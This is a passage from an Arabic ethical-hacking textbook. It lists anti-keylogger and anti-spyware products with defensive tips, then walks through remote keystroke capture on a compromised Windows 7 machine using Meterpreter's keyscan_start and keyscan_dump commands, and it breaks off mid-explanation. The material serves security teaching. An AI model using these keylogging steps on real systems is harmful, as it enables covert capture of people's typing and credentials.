‫‪ ،‬ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (KeyLogger‬ﺗﺳﺟﯾل اﻟﺣﺎﻓظﺔ )‪ ، (clipboard logger‬ﺗﺳﺟﯾل اﻟﺷﺎﺷﺔ )‪ ، (screen logger‬واﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺗﺟﺳﺳﯾﺔ )‪ ،(spyware‬ﻣﺻرﻓﻲ ‪ ،SSL‬واﻟﺗرواﺟن ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪431‬‬

‫‪Anti-Keyloggers: other tools‬‬

‫ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺗﻘوم ﺑﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﺑراﻣﺞ اﻟﺗﺟﺳس‪ ،‬ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز‪ ،‬وأﺟﮭزة ‪ .Keyloggers‬ﯾﺗم ﺳرد ﺑﻌض‬
‫ﻣن ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Anti-Keylogger available at http://www.anti-keyloggers.com‬‬
‫‪PrivacyKeyboard available at http://www.anti-keylogger.com‬‬
‫‪Defensewall HIPS available at http://www.softsphere.com‬‬
‫‪Keyscrambler available at http://www.qfxsoftware.com‬‬
‫‪I Hate Keyloggers available at http://dewasoft.com‬‬
‫‪SpyShelter STOP-LOGGER available at http://www.spyshelter.com‬‬
‫‪PrivacyKeyboard available at http://www.privacykeyboard.com‬‬
‫‪Elite Anti Keylogger available at http://www.elite-antikeylogger.com‬‬
‫‪CoDefender available at http://www.encassa.com‬‬

‫‪How to Defend Against Spyware‬‬

‫‪ Spyware‬ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم دون ﻋﻠم اﻟﻣﺳﺗﺧدم وﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟﺑﯾﺎﻧﺎت اﻟﺷﺧﺻﯾﺔ‬
‫وﺳﺟﻼت اﻟدﺧول‪ ،‬اﻟﺦ‪ Spyware .‬ﺗﺄﺗﻲ ﻣن ﺛﻼﺛﺔ ﻣﺻﺎدر أﺳﺎﺳﯾﺔ ھﻲ‪ :‬واﺣدة ﻣن اﻟﻣﺻﺎدر اﻟرﺋﯾﺳﯾﺔ ﻣن ﺧﻼل ﺗﺣﻣﯾل اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة‪،‬‬
‫واﻟﻣﺻدر اﻟﺛﺎﻧﻲ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟﻣﺻدر اﻟﺛﺎﻟث ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ھﻲ اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﺛﺑﯾت ﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد زﯾﺎرﺗﮭﺎ‪ .‬ھﻧﺎ طرق ﻟﻠدﻓﺎع ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -‬ﻻ ﺗﻘوم أﺑدا ﺑﺿﺑط ﻣﺳﺗوى أﻣن اﻹﻧﺗرﻧت اﻟﺧﺎﺻﺔ ﺑك اﻟﻰ ﻣﻧﺧﻔﺿﺔ ﺟدا )‪ (too low‬ﻷﻧﮫ ﯾوﻓر اﻟﻌدﯾد ﻣن اﻟﻔرص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس‬
‫ﻟﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ .‬ﻟذﻟك‪ ،‬ﯾﺗم ﺗﻌﯾﯾن إﻋداد اﻷﻣﺎن داﺋﻣﺎ ﻟﻣﺳﺗﻌرض اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك إﻣﺎ ﻋﺎﻟﯾﺔ أو‬
‫ﻣﺗوﺳطﺔ ﻟﺣﻣﺎﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫‪ -‬ﺟدار اﻟﺣﻣﺎﯾﺔ ﯾﻌزز ﻣﺳﺗوى اﻷﻣن ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -‬ﻻ ﺗﻔﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺷﺑوھﺔ وﻣرﻓﻘﺎت اﻟﻣﻠﻔﺎت اﻟواردة ﻣن ﻣرﺳﻠﯾن ﻏﯾر ﻣﻌروﻓﯾن‪ .‬ﺣﯾث أن ھﻧﺎك اﺣﺗﻣﺎل ﻛﺑﯾر أن‬
‫ﺗﺣﺻل ﻋﻠﻰ ﻓﯾروس‪ ،freeware ،‬أو ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻻ ﺗﻔﺗﺢ ﻣواﻗﻊ ﻏﯾر ﻣﻌروﻓﺔ اﻟﺗﻲ ﯾﺗم ﺗﻘدﯾﻣﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻟﻣزﻋﺞ‪ ،‬أو ﺑواﺳطﺔ ﻣﺣرﻛﺎت اﻟﺑﺣث‪ ،‬أو ﺗﻌرض ﻓﻲ ﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ ﻷﻧﮭﺎ ﻗد ﺗﻛون ﺗﺿﻠﯾل ﻟك ﻟﺗﺣﻣﯾل ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪432‬‬

‫ﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﻣﻛﺎﻓﺣﺔ ﻟﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس)‪ . (Anti-spyware software‬ﺣﯾث ﺗﻘوم ﺑﺣﻣﺎﯾﺗك ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬ ‫‪-‬‬
‫‪Antispyware‬ھو ﺧط اﻟدﻓﺎع اﻷول ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﺗﻲ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ .‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﻔﺣص دوري ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك وﯾﺣﻣﻲ ﺟﮭﺎزك ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﺗﺣﻘﻖ ﺑﺎﻧﺗظﺎم ﺗﻘﺎرﯾر إدارة اﻟﻣﮭﺎم )‪ (Task Manager reports‬وﺗﻘﺎرﯾر إدارة اﻻﻋداد)‪. (MS Configuration Manager reports‬‬ ‫‪-‬‬
‫ﺗﺟﻧب اﺳﺗﺧدام أي ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟذي ﻟﯾس ﺗﺣت ﺳﯾطرﺗك‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾث ﻣﻠﻔﺎت ﺗﻌرﯾف اﻟﻔﯾروﺳﺎت وﺗﻔﺣص اﻟﻧظﺎم ﺑﺣﺛﺎ ﻋن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺳﺎس ﻣﻧﺗظم‪.‬‬ ‫‪-‬‬
‫داﺋﻣﺎ ﯾﺟب اﺳﺗﺧدام اﻟﺣذر ﻣﻊ أي ﺷﻲء ﯾوﺟد ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أﺛﻧﺎء ﺗﻧزﯾل وﺗرﻛﯾب اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة‪ .‬ﻗﺑل ﺗﺣﻣﯾل أي ﺑرﻧﺎﻣﺞ‪،‬‬ ‫‪-‬‬
‫ﺗﺄﻛد ﻣن أﻧﮫ ھو ﻣن ﻣوﻗﻊ ﻣوﺛوق ﺑﮫ‪ .‬ﺗﺄﻛد ﻣن ﺗﺻرﯾﺣﺎت اﺗﻔﺎﻗﯾﺔ اﻟﺗرﺧﯾص‪ ،‬ﺗﺣذﯾر اﻷﻣﺎن‪ ،‬وﺗﺻرﯾﺣﺎت اﻟﺧﺻوﺻﯾﺔ اﻟﺗﻲ ﺗرﺗﺑط ﻣﻊ‬
‫اﻟﺑرﻧﺎﻣﺞ‪ .‬ﯾﻧﺑﻐﻲ أن ﺗﻘرأ ﺟﯾدا ﻟﻠﺣﺻول ﻋﻠﻰ ﻓﮭم واﺿﺢ ﻗﺑل اﻟﺗﺣﻣﯾل‪.‬‬
‫ﻻ ﺗﺳﺗﺧدم وﺿﻊ اﻹدارة ﻣﺎ ﻟم ﺗﻛن ﺿرورﯾﺔ ﻷن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل ﺑراﻣﺞ اﻟﺗﺟﺳس ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ وﺿﻊ اﻟﻣﺳؤول‪.‬‬ ‫‪-‬‬
‫وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﻗد ﯾﺣﺻل اﻟﻣﮭﺎﺟﻣﯾن ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫ﻻ ﺗﺳﺗﺧدم اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ )‪ (public terminal‬ﻟﻠوﺻول إﻟﻰ ﺣﺳﺎب ﻣﺻرﻓﻲ‪ ،‬واﻟﺗﺣﻘﻖ ﻣن ﺑﯾﺎﻧﺎت ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬واﻷﻧﺷطﺔ‬ ‫‪-‬‬
‫اﻟﺣﺳﺎﺳﺔ اﻷﺧرى‪ .‬اﻷﻧظﻣﺔ اﻟﻌﺎﻣﺔ ﻟﯾﺳت آﻣﻧﺔ ﻋﻠﻰ اﻹطﻼق‪ ،‬وﯾﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻌدﯾد ﻣن اﻟﻣﺳﺗﺧدﻣﯾن‪ .‬اﻟﺷرﻛﺔ اﻟﺗﻲ ﺗدﯾر‬
‫اﻟطرﻓﯾﺎت اﻟﻌﺎﻣﺔ ﻗد ﻻ ﺗﻔﺣص ﻧظﺎﻣﮭم ﻣن أﺟل ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﻻ ﺗﻘوم ﺑﺗﻧزﯾل ﻣﻠﻔﺎت اﻟﻣوﺳﯾﻘﻰ اﻟﻣﺟﺎﻧﯾﺔ‪ ، screensavers،‬أو اﻟوﺟوه اﻟﻣﺑﺗﺳﻣﺔ ﻣن اﻹﻧﺗرﻧت ﻷﻧﮫ ﻋﻧدﻣﺎ ﺗﻘوم ﺑﺗﺣﻣﯾل ھذه اﻟﺑراﻣﺞ‬ ‫‪-‬‬
‫اﻟﻣﺟﺎﻧﯾﺔ ﻓﮭﻧﺎك اﺣﺗﻣﺎل أن ﺗﺄﺗﻲ ﺑﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺧﻔﯾﮫ ﻣﻌﮫ‪.‬‬
‫اﻟﺣذر ﻣن اﻟﻧواﻓذ أو ﺻﻔﺣﺎت اﻟوﯾب اﻟﻣﻧﺑﺛﻘﺔ‪ .‬ﻻ ﺗﻘوم أﺑدا ﺑﺎﻟﻧﻘر ﻓوق أي ﻣﻛﺎن ﻋﻠﻰ اﻟﻧواﻓذ اﻟﺗﻲ ﺗﻌرض ﻟك رﺳﺎﺋل ﻣﺛل اﻟﺗﻲ ﺗﻘول‬ ‫‪-‬‬
‫ان ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻗد ﯾﻛون ﻣﺻﺎﺑﺎ )‪ ،(your computer may be infected‬أو أﻧﮭﺎ ﯾﻣﻛن أن ﺗﺳﺎﻋد ﺟﮭﺎز‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻟﻠﻌﻣل أﺳرع)‪ . (they can help your computer to run faster‬ﻋﻧد اﻟﻧﻘر ﻋﻠﻰ ھذه اﻟﻧواﻓذ ﺑك ﻗد‬
‫ﺗﺻﺎب ﺑﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﺣذف ﻣﻠﻔﺎت ﺗﻌرﯾف اﻻرﺗﺑﺎط )‪ (cookies‬ﺑﺷﻛل داﺋم‪ ،caches ،‬ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ‪ ،‬اﻟﺗﺎرﯾﺦ واﻟﻣﻠﻔﺎت اﻟﻣؤﻗﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‬ ‫‪-‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﺻﻔﺢ اﻹﻧﺗرﻧت‪.‬‬
‫ﻻ ﺗﻘم ﺑﺗﺧزﯾن ﻣﻌﻠوﻣﺎت ﺷﺧﺻﯾﺔ أو ﻣﺎﻟﯾﺔ ﻋﻠﻰ أي ﻧظﺎم ﻛﻣﺑﯾوﺗر ﻟﯾس ﺗﺣت ﺳﯾطرﺗك ﺗﻣﺎﻣﺎ‪ ،‬ﻣﺛل اﻟﺗﻲ ﻓﻲ أﺣد ﻣﻘﺎھﻲ اﻹﻧﺗرﻧت‪.‬‬ ‫‪-‬‬

‫‪Ant:-Spyware: PC Tools Spyware Doctor‬‬


‫اﻟﻣﺻدر‪http://www.pctools.com :‬‬
‫‪ PC Tools Spyware Doctor‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس واﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﺗﻲ ﻓﻲ ﻏﺎﯾﺔ اﻟﺧطورة‪ .‬ﯾﻛﺷف‬
‫وﯾﻌطل ﻣﺧﺗﻠف اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل ‪ ،Trojans ،adware‬ﻛﯾﻠوﺟرز‪ ،spybots ،‬وﻣﺎ إﻟﻰ ذﻟك ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﻣن اﻟﺳﮭل ﺟدا‬
‫ﺣﻣﺎﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك أو اﻟﻣﺎﻟﯾﺔ ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس ﺑﺎﺳﺗﺧدام ھذا‪ .‬ﺣﺗﻰ اﻟﺗﮭدﯾدات اﻟﺧطﯾرة ﯾﻣﻛن اﻟدﻓﺎع ﺑﺳﮭوﻟﺔ ﻋﻧدﻣﺎ‬
‫ﯾﺗﻛﺎﻣل ھذا اﻟﺑرﻧﺎﻣﺞ ﻣﻊ طﺑﻘﺎت ﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺣﻣﺎﯾﺔ‪ .‬ﯾﺗم ﻓﺣص اﻟﻣﻠﻔﺎت ﺟﯾدا ﻣن ﻗﺑل اﻟﺗدﺧل اﻟﻔﻌﻠﻲ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪433‬‬

‫‪Anti-Spywares: other tools‬‬


‫‪ AntiSpyWare‬ﺗﻘوم ﺑﻔﺣص اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬واﻟﺗﺣﻘﻖ ﻣن وﺟود ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣﺛل اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ ،‬وﺗروﺟﺎن‪، dialers ،‬‬
‫‪ ، Keyloggers ،worms‬و‪ ، rootkits‬وإزاﻟﺗﮭم إذا ﺗم اﻟﻌﺛور ﻋﻠﻰ أي واﺣد ﻣﻧﮭم‪ AntiSpyWare .‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‬
‫ﻋن طرﯾﻖ ﻓﺣص اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻋﻠﻰ ﻓﺗرات ﻣﻧﺗظﻣﺔ‪ ،‬إﻣﺎ أﺳﺑوﻋﯾﺎ أو ﯾوﻣﯾﺎ‪ .‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﻔﺣص اﻟﻛﻣﺑﯾوﺗر ﻟﺿﻣﺎن ﺧﻠوه ﻣن اﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪SUPERAntiSpyware available at http://superantispyware.com‬‬
‫‪Spyware Terminator 2012 available at http://www.pcrx.com‬‬
‫‪Ad-Aware Free Antivirus+ available at http://www.lavasoft.com‬‬
‫‪Norton Internet Security available at http://in.norton.com‬‬
‫‪SpyHunter available at http://www.enigmasoftware.com‬‬
‫‪Kaspersky Internet Security 2013 available at http://www.kaspersky.com‬‬
‫‪SecureAnywhere Complete 2012 available at http://www.webroot.com‬‬
‫‪MacScan available at http://macscan.securemac.com‬‬
‫‪Spybot - Search & Destroy available at http://www.safer-networking.org‬‬
‫‪Malwarebytes Anti-Malware PRO available at http://www.malwarebytes.org‬‬

‫‪Key Scan and Lockout Keylogger in Linux‬‬

‫أﺣﯾﺎﻧﺎ ﯾﻛون ﻣﺧﺗﺑر اﻻﺧﺗراق ﻗد ﺗﻣﻛن ﻣن اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ ﺟﮭﺎز اﻟﻣﺳﺗﺧدم‪ ،‬ﻟﻛﻧﮫ ﻗد ﻻ ﯾﻛون ﻋرف ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم‪ .‬رﺑﻣﺎ ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﻟدﯾﮫ ﻛﻠﻣﺔ ﻣرور طوﯾﻠﺔ وﻣﻌﻘدة ﻟﻠﻐﺎﯾﺔ واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺄﺧذ ﻓﻘط وﻗﺗﺎ طوﯾﻼ ﻟﻛﺳرھﺎ‪ .‬ﻣﺎذا ﯾﻣﻛن أن ﯾﻔﻌل؟‬
‫‪ Meterpreter‬ﻓﻲ إطﺎر ‪ Metasploit‬ﻟﮫ ﻓﺎﺋدة ﻛﺑﯾرة ﻻﻟﺗﻘﺎط ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف واﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ واﻟﺗﻲ‬
‫ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ‪ .Keyloggers‬ﺳﻧﺑدأ ﻣﻊ اﻟﻧظﺎم اﻟذي ﻗﻣﻧﺎ ﺑﺎﺧﺗراﻗﮫ ﺑﺎﻟﻔﻌل وﻗﻣﻧﺎ ﺑﺈﻧﺷﺎء ﺟﻠﺳﺔ ﻋﻣل ﻧﺎﺟﺣﺔ ﺑﻌﯾده ﻣﻌﮫ ﻣن ﺧﻼل ‪.Metasploit‬‬
‫ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ Meterpreter‬ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻧﻔس ھذه اﻟوﺣدة‪.‬‬

‫‪Key Logging with Meterpreter‬‬

‫ﻋﻧد اﻟﻘﯾﺎم ﺑطﺑﺎﻋﺔ اﻟﺗﻌﺑﯾر ‪ help‬ﻓﻲ طرﻓﯾﺔ ‪ Meterpreter‬ﺳوف ﯾﻘوم ﺑﺳرد ﺟﻣﯾﻊ اﻷواﻣر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣﻊ ‪.Meterpreter‬‬
‫ﻟﻛن ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام ‪ Meterpreter‬ﻷداء وظﯾﻔﺔ ‪ Keylogger‬وذﻟك ﻟﻣراﻗﺑﺔ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻟذﻟك ﻣﺎ ﯾﮭﻣﻧﺎ ھﻧﺎ ھو اﺳﺗﺧدام‬
‫اﻻﻣر ‪.keyscan‬‬

‫ﻟذﻟك دﻋوﻧﺎ ﻧﻣﺿﻲ ﻗدﻣﺎ وﻧرى ﻣﺎ ﯾﺑدو ﻋﻠﯾﮫ ﻋﻧدﻣﺎ ﻧﺑدأ اﺳﺗﺧدام ﻛﻠوﻏر ﻋن ﺑﻌد‪ ،‬ﺛم ﻧﻘوم ﺑﻌرض ﺿرﺑﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﺗﻲ ﺗم اﻟﺗﻘﺎطﮭﺎ‪.‬‬
‫‪ .1‬ﺑﺑﺳﺎطﮫ ﺑﻧدا ﻋﻣﻠﯾﺔ اﻟﺗﺟﺳس ﻋﻠﻰ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋن ﺑﻌد ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ keyscan_start‬ﻣن ﺧﻼل طرﻓﯾﺔ ‪.Meterpreter‬‬

‫‪ .2‬اﻵن ﻧﺣن ﺑﺣﺎﺟﺔ ﻓﻘط اﻟﻰ اﻻﻧﺗظﺎر ﺣﺗﻰ ﯾﻘوم اﻟﺿﺣﯾﺔ ﺑﺎﻟﻘﯾﺎم ﺑﺑﻌض اﻷﺷﯾﺎء ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﻟدﯾﻧﺎ‪ ،‬واﻟﻣﺿﻲ‬
‫ﻗدﻣﺎ وﻓﺗﺢ اﻟﻣﺗﺻﻔﺢ اﻟﺧﺎص ﺑوﯾﻧدوز ‪ ،7‬وإﺟراء ﺑﺣث ﻓﻲ ﺟوﺟل‪.‬‬
‫‪ .3‬اﻵن ﻣرة أﺧرى ﻧرﺟﻊ اﻟﻰ اﻟﻧظﺎم ﻛﺎﻟﻲ‪ ،‬ﻟﻧرى ﻣﺎ ﺗم ﻛﺗﺎﺑﺗﮫ ﺑﺑﺳﺎطﺔ وﯾﺗم ذﻟك ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪.keyscan_dump‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪434‬‬

‫ھﻧﺎ ﯾﻣﻛﻧك ان ﺗرى ﻣن ھذا اﻟﻌرض أن اﻟﻣﺳﺗﺧدم اﻟﮭدف ﻗﺎم ﺑﻛﺗﺎﺑﺔ "‪ "google.com‬ﻓﻲ ﻣﺗﺻﻔﺢ اﻟوﯾب ﺛم ﻗﺎم ﺑﺎﻟﺑﺣث ﻋن‬
‫" ?‪."Will Dallas go 8 and 8 again this year‬‬
‫ﺣﺳﻧﺎ‪ ،‬ﻣن اﻟواﺿﺢ ان اﻟﻣﺳﺗﺧدم ﻟدﯾﻧﺎ ھو ﻣن ﻣﺣﺑﻲ ﻛرة اﻟﻘدم داﻻس ﻛﺎو ﺑوﯾز‪ .‬دﻋوﻧﺎ ﻧﺣﺎول ﺑﻌض اﻷﺷﯾﺎء اﻷﺧرى‪ .‬ﻣﺎذا ﯾﺣدث إذا ﻗﺎم‬
‫اﻟﻣﺳﺗﺧدم ﺑﺎﺳﺗﺧدام ﻣﻔﺎﺗﯾﺢ ﺧﺎﺻﺔ ﻣﺛل ﻣﻔﺗﺎح وﯾﻧدوز؟ ﻣﺎ إذا ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺳﺗﺧدم اﻟﻣﻔﺗﺎح "وﯾﻧدوز" ‪ +‬اﻟﻣﻔﺗﺎح )‪ (I‬ﻟﻘﻔل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬ﺛم‬
‫ﯾﺳﺗﺧدم ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﻠﺣﺻول ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻣرة أﺧرى؟ أﯾﺿﺎ ﻣﺛﻼ ﻗﺎم اﻟﻣﺳﺗﺧدم ﺑﻘﻔل ﻧظﺎم وﯾﻧدوز اﻟﺧﺎص ﺑﮫ ﻣﻊ ﻣﻔﺗﺎح‬
‫"وﯾﻧدوز" وﻣﻔﺗﺎح "‪ ."L‬ﺛم ﺗﺳﺟﯾل اﻟدﺧول ﻣرة أﺧرى ﻓﻲ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬اﻵن ﻧذھب ﻣرة أﺧرى ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻣﻊ‬
‫‪ keyscan_dump‬ﻟﻧرى ﻣﺎ ﻟدﯾﻧﺎ‪:‬‬

‫ﻛﻣﺎ ﻧرى ان ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻗﺎم ﺑﺎﻟﺿرب ﻋﻠﻰ ﻣﻔﺎﺗﺢ وﯾﻧدوز‪ +‬ﻣﻔﺗﺎح ‪ L‬ﺑﺷﻛل ﺻﺣﯾﺢ واﻟذي ﯾﻘوم ﺑﻐﻠﻖ اﻟﺷﺎﺷﺔ وﻟﻛﻧﮫ ﻗﺎم ﺑﺎﻟﺗﺳﺟﯾل ﻣرة أﺧرى‬
‫ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻹﻟﻐﺎء ﻏﻠﻖ اﻟﺷﺎﺷﺔ‪ ،‬ﻓﺄﯾن ھﻲ ﻛﻠﻣﺔ اﻟﻣرور؟ ﻟﻣﺎذا ﻟم ﯾﺗم ﺗﺳﺟﯾﻠﮭﺎ!‬
‫اﻟﻣﺷﻛﻠﺔ ھﻲ ﻓﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻌﻣل ﺑﮭﺎ ﻧظﺎم اﻻﻣن ﻟﻠوﯾﻧدوز‪ .‬ﺣﯾث ﺑﺑﺳﺎطﺔ‪ ،‬أن ﺑﯾﺋﺔ ﺳطﺢ اﻟﻣﻛﺗب ﺗﺧﺗﻠف ﻋن ﺑﯾﺋﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺣﺗﻰ ﻓﻲ‬
